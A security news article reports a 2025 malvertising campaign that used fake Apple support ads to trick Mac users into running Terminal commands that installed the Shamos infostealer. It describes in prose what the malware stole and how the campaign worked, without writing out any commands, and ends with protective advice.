A new malware campaign targeting Mac users has been uncovered, and it’s using fake Apple support ads to deliver a dangerous variant of malware. According to security researchers, over 300 attempts to install Shamos, part of the Atomic Stealer family, were detected between June and August 2025. This campaign, tracked back to a criminal group named Cookie Spider, is a stark reminder of the risks lurking online.
Rather than relying on traditional phishing emails, the attackers used a more deceptive method: malvertising. By purchasing paid search ads, they directed users searching for simple technical fixes, like how to clear a DNS cache, to fraudulent Apple support websites.
How the Attack Unfolded
Once on these fake sites, users were prompted to enter a command into the macOS Terminal. The command appeared to be a harmless fix, but in reality, it bypassed Apple’s Gatekeeper security feature, allowing the installation of malicious software. The command was sometimes displayed in plain text, while other times, it was hidden using Base64 encoding.
Regardless of the format, the result was the installation of Shamos malware, which stole sensitive information such as browser data, Apple Keychain entries, Notes, and even cryptocurrency wallets. Once the data was collected, it was compressed into a zip file and sent out using curl, a standard macOS tool for transferring data.
In some cases, the malware also deployed a fake Ledger Live app and included a botnet module, expanding its reach even further. To avoid detection, Shamos created a persistent entry in the LaunchDaemons directory and checked for sandbox environments.
Why the Attack Was Successful
This campaign’s success can be attributed to a combination of technical trickery and social engineering. Users trusted what looked like official Apple support advice, and by purchasing ads, the attackers avoided the need for suspicious emails or unreliable torrent sites.
Additionally, the campaign deliberately avoided targeting regions like Russia and former Soviet states, likely to steer clear of local law enforcement efforts.
How to Protect Yourself
Mac users should be cautious and vigilant. Copying Terminal commands from unverified sources is a risky move that can lead to significant security breaches. Instead, always rely on official Apple documentation or well-known trusted forums for technical advice.
To reduce the risk of malware, only install apps from the Mac App Store or verified developer websites. Keeping macOS up to date with the latest security patches is also critical.
For extra protection, security software like CrowdStrike Falcon can help detect and block malicious scripts in real time. The most effective defense, however, is a healthy dose of skepticism. A few extra minutes spent verifying instructions can save you from major data theft.